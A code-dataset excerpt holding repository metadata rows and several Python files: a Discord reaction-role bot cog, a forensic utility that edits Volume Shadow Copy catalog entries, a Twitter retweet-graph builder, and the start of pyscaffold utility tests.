| 19.952381 | 47 | 0.637232 | 64 | 419 | 4.0625 | 0.734375 | 0.061538 | 0.069231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013889 | 0.140811 | 419 | 20 | 48 | 20.95 | 0.708333 | 0.21957 | 0 | 0 | 0 | 0 | 0.188088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62196c0a7e683018e9e4859226b62f1095464dff | 8,329 | py | Python | cogs/reaction_roles.py | milindmadhukar/Martin-Garrix-Bot | 571ed68a3eecab34513dd9b12c8527cff865e912 | [
"MIT"
] | 2 | 2021-08-28T07:34:16.000Z | 2021-08-28T11:55:55.000Z | cogs/reaction_roles.py | milindmadhukar/Martin-Garrix-Bot | 571ed68a3eecab34513dd9b12c8527cff865e912 | [
"MIT"
] | null | null | null | cogs/reaction_roles.py | milindmadhukar/Martin-Garrix-Bot | 571ed68a3eecab34513dd9b12c8527cff865e912 | [
"MIT"
] | 1 | 2022-01-05T05:58:29.000Z | 2022-01-05T05:58:29.000Z | import discord
from discord.ext import commands
import asyncio
import emojis as emoji_module
from discord.ext.commands.errors import BadArgument
from cogs.utils import custom_embed
class ReactionRoles(commands.Cog):
def __init__(self, bot) :
self.bot = bot
@commands.has_permissions(administrator=True)
@commands.command(help="Create a reaction role message by assigning roles to emojis.", aliases=['createReaction'])
async def create_reaction_role(self, ctx):
embed = discord.Embed(title="Create a reaction role.", description="Enter the channel to send message in.", colour=discord.Colour.gold())
check = lambda m: (m.author.id == ctx.author.id and m.channel.id == ctx.channel.id)
await ctx.send(embed=embed)
guild = ctx.guild
channel = None
title = None
emojis_role_data = []
timeout_embed = await custom_embed.failure_embed("Setup time out. Please try again.")
try:
user_input = await self.bot.wait_for('message', check=check, timeout = 180)
channel = await commands.TextChannelConverter().convert(ctx=ctx, argument=user_input.content)
await ctx.send(f"Reaction role channel set to be: {channel.mention}")
except BadArgument:
return await ctx.send(embed= await custom_embed.failure_embed("Reaction role setup failed.", description="Please enter a valid channel."))
except asyncio.TimeoutError:
return await ctx.send(embed=timeout_embed)
embed.title = None
embed.description = "Enter the title/category of reaction role."
await ctx.send(embed=embed)
try:
title = await self.bot.wait_for('message', check=check, timeout = 180)
title = title.content
except asyncio.TimeoutError:
return await ctx.send(embed=timeout_embed)
await ctx.send(f"Title set to be: {title}")
user_input = None
count = 0
try:
while user_input != 'exit' and count < 20:
count += 1
await ctx.send(f"""Enter Role name. {"Type 'exit' to stop adding roles." if count > 1 else ''}""")
user_input = await self.bot.wait_for('message', check=check, timeout = 180)
if user_input.content == 'exit':
break
role = discord.utils.get(guild.roles, name=user_input.content)
if role is None:
await ctx.send("That role does not exist. Do you want me to create it?")
createRole = await self.bot.wait_for('message', check=check, timeout = 180)
if createRole.content.lower() in ['yes', 'y', 'ye', 'okay', 'ok' , 'k']:
role = await guild.create_role(name=user_input.content)
await ctx.send(f"Created the role {role.mention} !")
else:
count -= 1
continue
elif role.position > guild.get_member(self.bot.user.id).roles[-1].position:
await ctx.send("Missing permissions to add the role. That role is higher than my role. Place the role below my role to add it to reaction roles.")
count -= 1
continue
embed.description = f"Enter the emoji corresponding to the role {role.mention}"
await ctx.send(embed=embed)
emoji = await self.bot.wait_for('message', check=check, timeout = 180)
emoji = emoji.content
if emoji_module.count(emoji) == 0:
try:
emoji = await commands.PartialEmojiConverter().convert(ctx=ctx, argument=emoji)
except BadArgument:
await ctx.send(embed=await custom_embed.failure_embed(title="Bad emoji argument. Please retry."))
count -= 1
role = None
continue
emojis_role_data.append([role, str(emoji)])
if len(emojis_role_data) == 0:
return
description = ""
for data in emojis_role_data:
description += f"{data[1]} for the {data[0].mention} role.\n"
reaction_embed = discord.Embed(title=title, color=discord.Colour.blue())
reaction_embed.add_field(name="The emojis and corresponding roles are:", value=description)
reaction_message = await channel.send(embed=reaction_embed)
await self.bot.db.execute("INSERT INTO reaction_roles (guild_id, message_id) VALUES ($1,$2)", reaction_message.guild.id, reaction_message.id)
reaction_message_fk = await self.bot.db.fetchrow("SELECT id FROM reaction_roles WHERE guild_id = $1 AND message_id = $2", reaction_message.guild.id, reaction_message.id)
query = "INSERT INTO emoji_role (emoji, role_id, reaction_role_id) VALUES ($1, $2, $3)"
for data in emojis_role_data:
try:
await self.bot.db.execute(query, str(data[1]), data[0].id, reaction_message_fk['id'])
except:
pass
await reaction_message.add_reaction(data[1])
await asyncio.sleep(0.5)
return await ctx.send(embed=await custom_embed.success_embed("Successfully created the reaction roles."))
except asyncio.TimeoutError:
return await ctx.send(embed=timeout_embed)
@commands.Cog.listener()
async def on_raw_reaction_add(self,payload):
if payload.member.bot:
return
query = "SELECT message_id FROM reaction_roles WHERE guild_id = $1"
reaction_roles = await self.bot.db.fetch(query, payload.guild_id)
if payload.message_id not in [role['message_id'] for role in reaction_roles]:
return
else:
guild_id = payload.guild_id
query = "SELECT * FROM reaction_roles JOIN emoji_role ON emoji_role.reaction_role_id = reaction_roles.id WHERE reaction_roles.guild_id = $1 AND reaction_roles.message_id = $2"
records = await self.bot.db.fetch(query, guild_id, payload.message_id)
role = None
records = {record['emoji']: record['role_id'] for record in records}
role_id = records.get(str(payload.emoji))
if role_id is not None:
guild = self.bot.get_guild(guild_id)
role = guild.get_role(role_id)
if role is not None:
await payload.member.add_roles(role, reason="Reaction Role")
try:
return await payload.member.send(f'Gave you the **{role.name}** role!')
except:
pass
@commands.Cog.listener()
async def on_raw_reaction_remove(self,payload):
query = "SELECT message_id FROM reaction_roles WHERE guild_id = $1"
reaction_roles = await self.bot.db.fetch(query, payload.guild_id)
if payload.message_id not in [role['message_id'] for role in reaction_roles]:
return
else:
guild_id = payload.guild_id
guild = None
query = "SELECT * FROM reaction_roles JOIN emoji_role ON emoji_role.reaction_role_id = reaction_roles.id WHERE reaction_roles.guild_id = $1 AND reaction_roles.message_id = $2"
records = await self.bot.db.fetch(query, guild_id, payload.message_id)
role = None
records = {record['emoji']: record['role_id'] for record in records}
role_id = records.get(str(payload.emoji))
if role_id is not None:
guild = self.bot.get_guild(guild_id)
role = guild.get_role(role_id)
if role is not None:
member = guild.get_member(payload.user_id)
await member.remove_roles(role, reason="Reaction Role")
try:
await member.send(f'Removed the **{role.name}** role!')
except:
pass
def setup(bot):
bot.add_cog(ReactionRoles(bot))
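# Usage sketch (assumption, not part of this cog): with the repository layout
# implied by the path cogs/reaction_roles.py, the cog would normally be loaded
# from the bot's entry point with something like
#   bot.load_extension("cogs.reaction_roles")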
| 52.71519 | 188 | 0.587946 | 1,017 | 8,329 | 4.6765 | 0.172075 | 0.049201 | 0.037847 | 0.03217 | 0.463415 | 0.440706 | 0.400967 | 0.388772 | 0.33894 | 0.320017 | 0 | 0.00811 | 0.319006 | 8,329 | 157 | 189 | 53.050955 | 0.830395 | 0 | 0 | 0.486111 | 0 | 0.020833 | 0.206707 | 0.018358 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013889 | false | 0.020833 | 0.041667 | 0 | 0.131944 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621b4b015de4cddfed681b62008a4c2685b2bbb4 | 15,007 | py | Python | vss_catalog_manipulator.py | bcvisualbooking/vss_carver | d58896b08fad5d8950ca6807e784a2ec08dc3abb | [
"MIT"
] | 1 | 2019-08-31T11:14:58.000Z | 2019-08-31T11:14:58.000Z | vss_catalog_manipulator.py | bcvisualbooking/vss_carver | d58896b08fad5d8950ca6807e784a2ec08dc3abb | [
"MIT"
] | null | null | null | vss_catalog_manipulator.py | bcvisualbooking/vss_carver | d58896b08fad5d8950ca6807e784a2ec08dc3abb | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
#
# vss_catalog_manipulator.py
# Manipulates VSS catalog file that recreated by vss_carver.py.
#
# Copyright (C) 2018 Minoru Kobayashi <unknownbit@gmail.com> (@unkn0wnbit)
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
#
import argparse
import struct
import copy
import datetime
import uuid
from ctypes import *
vss_identifier = b'\x6B\x87\x08\x38\x76\xC1\x48\x4E\xB7\xAE\x04\x04\x6E\x6C\xC7\x52'
class CatalogBlockHeader(LittleEndianStructure):
_fields_ = (
('vssid', c_char * 16),
('version', c_uint32),
('record_type', c_uint32),
('relative_catalog_offset', c_uint64),
('current_catalog_offset', c_uint64),
('next_catalog_offset', c_uint64),
('unknown_empty', c_char * 80)
)
def __init__(self, relative=0, current=0, next_offset=0):
self.vssid = vss_identifier
self.version = 0x1
self.record_type = 0x2
self.relative_catalog_offset = relative
self.current_catalog_offset = current
self.next_catalog_offset = next_offset
self.unknown_empty = b'\x00'
class CatalogEntry0x00(LittleEndianStructure):
_fields_ = (
('catalog_entry_type', c_uint64),
('unknown', c_char * 120)
)
def __init__(self):
self.catalog_entry_type = 0x0
self.unknown = b'\x00'
class CatalogEntry0x01(LittleEndianStructure):
_fields_ = (
('catalog_entry_type', c_uint64),
('unknown', c_char * 120)
)
def __init__(self):
self.catalog_entry_type = 0x01
self.unknown = b'\x00'
class CatalogEntry0x02(LittleEndianStructure):
_fields_ = (
('catalog_entry_type', c_uint64),
('volume_size', c_uint64),
('store_guid', c_ubyte * 16),
('sequence_number', c_uint64),
('unknown_flags', c_uint64),
('shadow_copy_creation_time', c_uint64),
('unknown_empty', c_char * 72)
)
def __init__(self):
self.catalog_entry_type = 0x02
self.unknown_flags = 0x40
self.unknown_empty = b'\x00'
class CatalogEntry0x03(LittleEndianStructure):
_fields_ = (
('catalog_entry_type', c_uint64),
('store_block_list_offset', c_uint64),
('store_guid', c_ubyte * 16),
('store_header_offset', c_uint64),
('store_block_range_offset', c_uint64),
('store_current_bitmap_offset', c_uint64),
('ntfs_file_reference', c_uint64),
('allocated_size', c_uint64),
('store_previous_bitmap_offset', c_uint64),
('unknown', c_uint64),
('unknown_empty', c_char * 40)
)
def __init__(self):
self.catalog_entry_type = 0x03
self.ntfs_file_reference = 0x0
self.allocated_size = 0x0
self.store_previous_bitmap_offset = 0x0
self.unknown = 0x0
self.unknown_empty = b'\x00'
class CatalogEntry(LittleEndianStructure):
def __init__(self):
self.enable = True
self.catalog0x02 = CatalogEntry0x02()
self.catalog0x03 = CatalogEntry0x03()
def read_catalog(f_catalog):
list_catalog_entry = []
catalog_block_header = CatalogBlockHeader()
catalog_entry = CatalogEntry()
catalog_file_offset = 0
for catalog_block_offset in [0x0, 0x4000, 0x8000, 0xc000]:
f_catalog.seek(catalog_block_offset)
f_catalog.readinto(catalog_block_header)
catalog_file_offset = catalog_file_offset + 128
if not (catalog_block_header.vssid == vss_identifier and catalog_block_header.version == 0x1 and catalog_block_header.record_type == 0x2):
exit("This file is not VSS catalog.")
while catalog_file_offset < catalog_block_offset + 0x4000 - 128:
catalog_entry_type, data = struct.unpack("<QQ", f_catalog.read(16))
f_catalog.seek(-16, 1)
if catalog_entry_type == 0x2:
catalog_entry.enable = True
f_catalog.readinto(catalog_entry.catalog0x02)
f_catalog.readinto(catalog_entry.catalog0x03)
catalog_file_offset = catalog_file_offset + 128 * 2
if all(x == y for x, y in zip(catalog_entry.catalog0x02.store_guid, catalog_entry.catalog0x03.store_guid)):
list_catalog_entry.append(copy.deepcopy(catalog_entry))
else:
guid = bytearray(len(catalog_entry.catalog0x02.store_guid))
for i in range(len(catalog_entry.catalog0x02.store_guid)):
guid[i] = catalog_entry.catalog0x02.store_guid[i]
print("Catalog Entry Type 0x02 GUID: {0}".format(str(uuid.UUID(bytes_le=bytes(guid)))))
for i in range(len(catalog_entry.catalog0x03.store_guid)):
guid[i] = catalog_entry.catalog0x03.store_guid[i]
print("Catalog Entry Type 0x03 GUID: {0}".format(str(uuid.UUID(bytes_le=bytes(guid)))))
exit(" Catalog GUID doesn't match.")
elif catalog_entry_type == 0x1 and data != 0x0:
catalog_entry.enable = False
f_catalog.readinto(catalog_entry.catalog0x02)
f_catalog.readinto(catalog_entry.catalog0x03)
catalog_file_offset = catalog_file_offset + 128 * 2
list_catalog_entry.append(copy.deepcopy(catalog_entry))
else:
f_catalog.read(128)
catalog_file_offset = catalog_file_offset + 128
return list_catalog_entry
def write_catalog(f_new_catalog, list_catalog_entry):
index_catalog = 0
for catalog_offset in [0x0, 0x4000, 0x8000, 0xc000]:
buf = 0x0
if catalog_offset == 0xc000:
next_block_offset = 0x0
else:
next_block_offset = catalog_offset + 0x4000
if buf == 0:
f_new_catalog.write(CatalogBlockHeader(catalog_offset, catalog_offset, next_block_offset))
buf = buf + 128
while next_block_offset - buf > 128 * 2 and index_catalog < len(list_catalog_entry):
f_new_catalog.write(list_catalog_entry[index_catalog].catalog0x02)
f_new_catalog.write(list_catalog_entry[index_catalog].catalog0x03)
buf = buf + 128 * 2
index_catalog = index_catalog + 1
if index_catalog == len(list_catalog_entry):
break
for i in range((0x4000 - buf) // 128):
f_new_catalog.write(CatalogEntry0x00())
buf = buf + 128
def print_entry(list_catalog_entry):
epoch_as_filetime = 116444736000000000 # January 1, 1970 as MS file time
hundreds_of_nanoseconds = 10000000
index = 0
for entry in list_catalog_entry:
dt = datetime.datetime.utcfromtimestamp((entry.catalog0x02.shadow_copy_creation_time - epoch_as_filetime)/hundreds_of_nanoseconds)
if entry.enable:
enable_state = "Enable"
else:
enable_state = "Disable"
guid = bytearray(len(entry.catalog0x02.store_guid))
for i in range(len(entry.catalog0x02.store_guid)):
guid[i] = entry.catalog0x02.store_guid[i]
print("[{0}] {1}, Date: {2}, GUID: {3}".format(index, enable_state, dt, str(uuid.UUID(bytes_le=bytes(guid)))))
index = index + 1
def parse_entry_number(entry_number):
list_entry_number = []
for number in entry_number.split(','):
if not ('-' in number):
list_entry_number.append(int(number))
elif '-' in number:
start, end = number.split('-')
if int(start) >= int(end):
exit("Corrupt entry number.")
for i in range(int(start), int(end) + 1):
list_entry_number.append(int(i))
else:
exit("Corrupt entry number.")
return list_entry_number
def move_entry_internal(list_catalog_entry, entry_number, destination):
hundreds_of_nanoseconds = 10000000
list_result = []
list_entry_number = parse_entry_number(entry_number)
list_entry_number.sort()
# move
for i in range(0,destination):
if i in list_entry_number:
continue
list_result.append(list_catalog_entry[i])
for i in list_entry_number:
list_result.append(list_catalog_entry[i])
for i in range(destination, len(list_catalog_entry)):
if i in list_entry_number:
continue
list_result.append(list_catalog_entry[i])
# change meta data
index = 0
sequence_number = list_result[0].catalog0x02.sequence_number
creation_time = list_result[0].catalog0x02.shadow_copy_creation_time
for entry in list_result:
entry.catalog0x02.sequence_number = sequence_number - index
entry.catalog0x02.shadow_copy_creation_time = creation_time - hundreds_of_nanoseconds * 60 * 60 * index
index = index + 1
return list_result
def remove_entry_internal(list_catalog_entry, entry_number):
list_entry_number = parse_entry_number(entry_number)
list_entry_number.sort(reverse=True)
for i in list_entry_number:
del list_catalog_entry[i]
def enable_entry_internal(list_catalog_entry, entry_number):
list_entry_number = parse_entry_number(entry_number)
for i in list_entry_number:
list_catalog_entry[i].enable = True
list_catalog_entry[i].catalog0x02.catalog_entry_type = 0x2
list_catalog_entry[i].catalog0x03.catalog_entry_type = 0x3
def disable_entry_internal(list_catalog_entry, entry_number):
list_entry_number = parse_entry_number(entry_number)
for i in list_entry_number:
list_catalog_entry[i].enable = False
list_catalog_entry[i].catalog0x02.catalog_entry_type = 0x1
list_catalog_entry[i].catalog0x03.catalog_entry_type = 0x1
def list_entry(args):
f_catalog = open(args.catalog, "rb")
list_catalog_entry = read_catalog(f_catalog)
print_entry(list_catalog_entry)
f_catalog.close()
def move_entry(args):
f_catalog = open(args.catalog, "rb")
f_new_catalog = open(args.catalog + "_move", "wb")
list_catalog_entry = read_catalog(f_catalog)
list_result = move_entry_internal(list_catalog_entry, args.entry_number, args.destination)
print_entry(list_result)
write_catalog(f_new_catalog, list_result)
f_catalog.close()
f_new_catalog.close()
def remove_entry(args):
f_catalog = open(args.catalog, "rb")
f_new_catalog = open(args.catalog + "_remove", "wb")
list_catalog_entry = read_catalog(f_catalog)
remove_entry_internal(list_catalog_entry, args.entry_number)
print_entry(list_catalog_entry)
write_catalog(f_new_catalog, list_catalog_entry)
f_catalog.close()
f_new_catalog.close()
def enable_entry(args):
f_catalog = open(args.catalog, "rb")
f_new_catalog = open(args.catalog + "_enable", "wb")
list_catalog_entry = read_catalog(f_catalog)
enable_entry_internal(list_catalog_entry, args.entry_number)
print_entry(list_catalog_entry)
write_catalog(f_new_catalog, list_catalog_entry)
f_catalog.close()
f_new_catalog.close()
def disable_entry(args):
f_catalog = open(args.catalog, "rb")
f_new_catalog = open(args.catalog + "_disable", "wb")
list_catalog_entry = read_catalog(f_catalog)
disable_entry_internal(list_catalog_entry, args.entry_number)
print_entry(list_catalog_entry)
write_catalog(f_new_catalog, list_catalog_entry)
f_catalog.close()
f_new_catalog.close()
def main():
parser = argparse.ArgumentParser(description="Manipulate VSS snapshot catalog file. This tool expects output of vss_carver.py.")
subparsers = parser.add_subparsers(help='sub-command help', title='subcommands')
# parser.add_argument('--debug', action='store_true', default=False,
# help='debug mode if this flag is set (default: False)')
# list
parser_list = subparsers.add_parser('list', help='list -h')
parser_list.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_list.set_defaults(func=list_entry)
# move
parser_move = subparsers.add_parser('move', help='move -h. This manipulation will change several meta data (change shadow copy creation time, etc).')
parser_move.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_move.add_argument('entry_number', action='store', type=str,
help='list of entry numbers to move.')
parser_move.add_argument('destination', action='store', type=int,
help='entry number of destination.')
parser_move.set_defaults(func=move_entry)
# remove
parser_remove = subparsers.add_parser('remove', help='remove -h')
parser_remove.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_remove.add_argument('entry_number', action='store', type=str,
help='list of entry numbers to remove. ex) 2,3,5-8')
parser_remove.set_defaults(func=remove_entry)
# enable
parser_enable = subparsers.add_parser('enable', help='enable -h')
parser_enable.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_enable.add_argument('entry_number', action='store', type=str,
help='list of entry numbers to enable. ex) 2,3,5-8')
parser_enable.set_defaults(func=enable_entry)
# disable
parser_disable = subparsers.add_parser('disable', help='enable -h')
parser_disable.add_argument('catalog', action='store', type=str,
help='path to catalog file.')
parser_disable.add_argument('entry_number', action='store', type=str,
help='list of entry numbers to disable. ex) 2,3,5-8')
parser_disable.set_defaults(func=disable_entry)
# offset
# parser_disable = subparsers.add_parser('disable', help='enable -h')
# parser_disable.add_argument('catalog', action='store', type=str,
# help='path to catalog file.')
# parser_disable.add_argument('entry_number', action='store', type=str,
# help='list of entry numbers to disable. ex) 2,3,5-8')
# parser_disable.set_defaults(func=disable_entry)
args = parser.parse_args()
if hasattr(args, 'func'):
args.func(args)
else:
parser.print_help()
if __name__ == "__main__":
main()
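# Example invocations (illustrative only, derived from the argparse setup above):
#   python vss_catalog_manipulator.py list my_catalog
#   python vss_catalog_manipulator.py disable my_catalog 2,3,5-8
#   python vss_catalog_manipulator.py move my_catalog 0-1 4
# Every subcommand except "list" writes a modified copy next to the input
# (e.g. "my_catalog_disable") and leaves the original catalog file untouched.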
| 38.777778 | 154 | 0.643033 | 1,838 | 15,007 | 4.927095 | 0.137106 | 0.099382 | 0.074205 | 0.021864 | 0.540526 | 0.508503 | 0.438383 | 0.387257 | 0.326193 | 0.29682 | 0 | 0.038465 | 0.258546 | 15,007 | 386 | 155 | 38.878238 | 0.775411 | 0.060438 | 0 | 0.324232 | 0 | 0.003413 | 0.110989 | 0.017244 | 0 | 0 | 0.010522 | 0 | 0 | 1 | 0.068259 | false | 0.003413 | 0.020478 | 0 | 0.136519 | 0.03413 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621ba61eea160a3bde8e53186bebb5414bd26c3c | 7,169 | py | Python | DatabaseCreation/GraphDBCreation/Twitterutils.py | arg-hya/RumourDetection | f10d0201de679bd28b7dc20346752691caeb2795 | [
"MIT"
] | null | null | null | DatabaseCreation/GraphDBCreation/Twitterutils.py | arg-hya/RumourDetection | f10d0201de679bd28b7dc20346752691caeb2795 | [
"MIT"
] | null | null | null | DatabaseCreation/GraphDBCreation/Twitterutils.py | arg-hya/RumourDetection | f10d0201de679bd28b7dc20346752691caeb2795 | [
"MIT"
] | null | null | null | import json
# First networkx library is imported
# along with matplotlib
import networkx as nx
from pyvis.network import Network
import matplotlib.pyplot as plt
from bokeh.io import output_notebook, show, save
from bokeh.models import Range1d, Circle, ColumnDataSource, MultiLine
from bokeh.plotting import figure
from bokeh.plotting import from_networkx
from datetime import datetime
# Defining a Class
class GraphVisualization:
def __init__(self):
# visual is a list which stores all
# the set of edges that constitutes a
# graph
self.visual = []
# addEdge function inputs the vertices of an
# edge and appends it to the visual list
def addEdge(self, a, b):
temp = [a, b]
self.visual.append(temp)
# In visualize function G is an object of
# class Graph given by networkx G.add_edges_from(visual)
# creates a graph with a given list
# nx.draw_networkx(G) - plots the graph
# plt.show() - displays the graph
def visualize(self):
G = nx.Graph()
G.add_edges_from(self.visual)
print("Edges add to graph")
#nx.draw(G)
#nx.draw_networkx(G)
nx.write_gexf(G, "some_graph.gexf")
nt = Network(height='750px', width='100%')
# populates the nodes and edges data structures
nt.from_nx(G)
print("Network build done")
nt.show('nx.html')
#plt.show()
def save(self, dirPath, fileName):
G = nx.Graph()
G.add_edges_from(self.visual)
#print("Edges add to graph")
graphFilePath = dirPath + '/graph/' + fileName + '.gexf'
nx.write_gexf(G, graphFilePath)
nt = Network(height='750px', width='100%')
nt.from_nx(G)
#print("Network build done")
nt.save_graph(dirPath + '/graph/' + fileName + '.html')
def visualize1(self):
G = nx.Graph()
G.add_edges_from(self.visual)
print("Edges add to graph")
# Choose a title!
title = 'Game of Thrones Network'
# Establish which categories will appear when hovering over each node
HOVER_TOOLTIPS = [("Character", "@index")]
# Create a plot — set dimensions, toolbar, and title
plot = figure(tooltips=HOVER_TOOLTIPS,
tools="pan,wheel_zoom,save,reset", active_scroll='wheel_zoom',
x_range=Range1d(-10.1, 10.1), y_range=Range1d(-10.1, 10.1), title=title)
# Create a network graph object with spring layout
# https://networkx.github.io/documentation/networkx-1.9/reference/generated/networkx.drawing.layout.spring_layout.html
print("plot initialized")
network_graph = from_networkx(G, nx.spring_layout, scale=10, center=(0, 0))
print("Network imported")
# Set node size and color
network_graph.node_renderer.glyph = Circle(size=15, fill_color='skyblue')
print("Network rendered")
# Set edge opacity and width
network_graph.edge_renderer.glyph = MultiLine(line_alpha=0.5, line_width=1)
# Add network graph to the plot
plot.renderers.append(network_graph)
print("Graph appended")
show(plot)
# save(plot, filename=f"{title}.html")
IdtoTimeMap = {}
rootID = 59736485
def convertTwitterTime(time_val) :
new_datetime = datetime.strftime(datetime.strptime(time_val, '%a %b %d %H:%M:%S +0000 %Y'), '%Y-%m-%d %H:%M:%S')
timestamp = datetime.timestamp(datetime.strptime(new_datetime, '%Y-%m-%d %H:%M:%S'))
return timestamp
def test() :
filePath = 'D:/Twitter/FakeNewsNet-master/FakeNewsNet-master/code/fakenewsnet_dataset/politifact/fake/politifact14745/retweets/929507659073687552.json'
with open(filePath) as f:
retweet_dict = json.load(f)
for retweet in retweet_dict['retweets'] :
root_time_val = retweet['retweeted_status']['created_at']
print(root_time_val)
break
IdtoTimeMap[rootID] = convertTwitterTime(root_time_val)
print(IdtoTimeMap[rootID])
def createIdtoTimeMap() :
filePath = 'D:/Twitter/FakeNewsNet-master/FakeNewsNet-master/code/fakenewsnet_dataset/politifact/fake/politifact14745/retweets/929507659073687552.json'
with open(filePath) as f:
retweet_dict = json.load(f)
print("Json loaded")
for retweet in retweet_dict['retweets']:
root_time_val = retweet['retweeted_status']['created_at']
print(root_time_val)
break
IdtoTimeMap[rootID] = convertTwitterTime(root_time_val)
print("Root timestamp = ", IdtoTimeMap[rootID])
for retweet in retweet_dict['retweets']:
id = retweet['user']['id']
time_val = retweet['created_at']
print(time_val)
IdtoTimeMap[id] = convertTwitterTime(time_val)
def getLevelfromTime(timestamp) :
#print("timestamp = ", timestamp)
level = (timestamp - IdtoTimeMap[rootID])
print("level = ", level)
return level / 5000
pos = 1
def addDistantEdge(G, a, b) :
#if b not in IdtoTimeMap:
# return
#print(type(b))
#print((IdtoTimeMap[40708919]))
#print(IdtoTimeMap)
timestamp = IdtoTimeMap[int(b)]
level = getLevelfromTime(timestamp)
start = a
global pos
for i in range(0,int(level)) :
end = pos
G.addEdge(start, end)
start = pos
pos = pos + 1
G.addEdge(start, b)
print("Pos = ", pos)
def makeGraph() :
createIdtoTimeMap()
# Driver code
G = GraphVisualization()
filePath = 'Id2Followers.json'
with open(filePath) as f:
ids_dict = json.load(f)
print("Id2Followers Json loaded")
for key in ids_dict :
# Iterating over values
#print("Building graph for ID = ", key)
for id, friends in ids_dict.items():
# Add connection between retweet IDs
if (key in friends):
print("Edge detected")
G.addEdge(key, id)
'''
counter = 0
for id, friends in ids_dict.items():
counter = counter + 1
if counter == 5 :
break
print("Building graph for friends of ID = ", id)
for frnd in friends :
count = 0
for id_1, friends_1 in ids_dict.items():
if(count == 1) :
break
if (frnd in friends_1) & (id != id_1) :
count = count + 1
#print("detected")
G.addEdge(frnd, id_1)
G.addEdge(id, frnd)
#if count != 0 :
# print(count)
'''
# Add conncetion with primary
for id, friends in ids_dict.items():
if (59736485 in friends):
print("[Primary] Edge detected")
else :
print("Adding distand edge = ", id)
addDistantEdge(G, 59736485, id)
#G.addEdge(59736485, id)
print("Graph building done...")
G.visualize()
print("Program Ended")
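# Added entry-point sketch (not in the original module): nothing above actually
# calls makeGraph(), so a conventional guard is provided here. Running it requires
# the Id2Followers.json file and the hard-coded retweet JSON path used above.
if __name__ == "__main__":
    makeGraph()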
| 33.189815 | 156 | 0.597712 | 863 | 7,169 | 4.87022 | 0.273465 | 0.01832 | 0.015703 | 0.012372 | 0.269331 | 0.259576 | 0.221984 | 0.203426 | 0.203426 | 0.188199 | 0 | 0.029668 | 0.294741 | 7,169 | 215 | 157 | 33.344186 | 0.801424 | 0.17771 | 0 | 0.266667 | 0 | 0.016667 | 0.172765 | 0.060188 | 0 | 0 | 0 | 0 | 0 | 1 | 0.091667 | false | 0 | 0.083333 | 0 | 0.2 | 0.175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621c46c129624beed8792b89b80e5ed6f1ce1412 | 5,637 | py | Python | tests/test_utils.py | HolgerPeters/pyscaffold | 04f3435fbe882041bf5860e164d07f8bd148a764 | [
"BSD-3-Clause"
] | null | null | null | tests/test_utils.py | HolgerPeters/pyscaffold | 04f3435fbe882041bf5860e164d07f8bd148a764 | [
"BSD-3-Clause"
] | null | null | null | tests/test_utils.py | HolgerPeters/pyscaffold | 04f3435fbe882041bf5860e164d07f8bd148a764 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import tempfile
import pytest
import six
from pyscaffold import runner, utils
from pyscaffold.structure import create_structure
from .fixtures import tmpdir # noqa
def test_chdir():
curr_dir = os.getcwd()
try:
temp_dir = tempfile.mkdtemp()
with utils.chdir(temp_dir):
new_dir = os.getcwd()
assert new_dir == os.path.realpath(temp_dir)
assert curr_dir == os.getcwd()
finally:
os.rmdir(temp_dir)
def test_is_valid_identifier():
bad_names = ["has whitespace",
"has-hyphen",
"has_special_char$",
"1starts_with_digit"]
for bad_name in bad_names:
assert not utils.is_valid_identifier(bad_name)
valid_names = ["normal_variable_name",
"_private_var",
"_with_number1"]
for valid_name in valid_names:
assert utils.is_valid_identifier(valid_name)
def test_make_valid_identifier():
assert utils.make_valid_identifier("has whitespaces ") == "has_whitespaces"
assert utils.make_valid_identifier("has-hyphon") == "has_hyphon"
assert utils.make_valid_identifier("special chars%") == "special_chars"
assert utils.make_valid_identifier("UpperCase") == "uppercase"
with pytest.raises(RuntimeError):
utils.make_valid_identifier("def")
def test_safe_set():
args = ["my-project", "-u", "http://www.blue-yonder.com/"]
args = runner.parse_args(args)
utils.safe_set(args, "new_option", "value")
assert args.new_option == "value"
utils.safe_set(args, "license", "my license")
assert args.license == "my license"
utils.safe_set(args, "url", "http://www.python.org/")
assert args.url == "http://www.blue-yonder.com/"
def test_safe_get():
args = ["my-project", "-u", "http://www.blue-yonder.com/"]
args = runner.parse_args(args)
assert utils.safe_get(args, "url") == "http://www.blue-yonder.com/"
assert utils.safe_get(args, "non_existent") is None
def test_list2str():
classifiers = ['Development Status :: 4 - Beta',
'Programming Language :: Python']
class_str = utils.list2str(classifiers, indent=len("classifiers = ") + 1)
exp_class_str = """\
['Development Status :: 4 - Beta',
'Programming Language :: Python']"""
assert class_str == exp_class_str
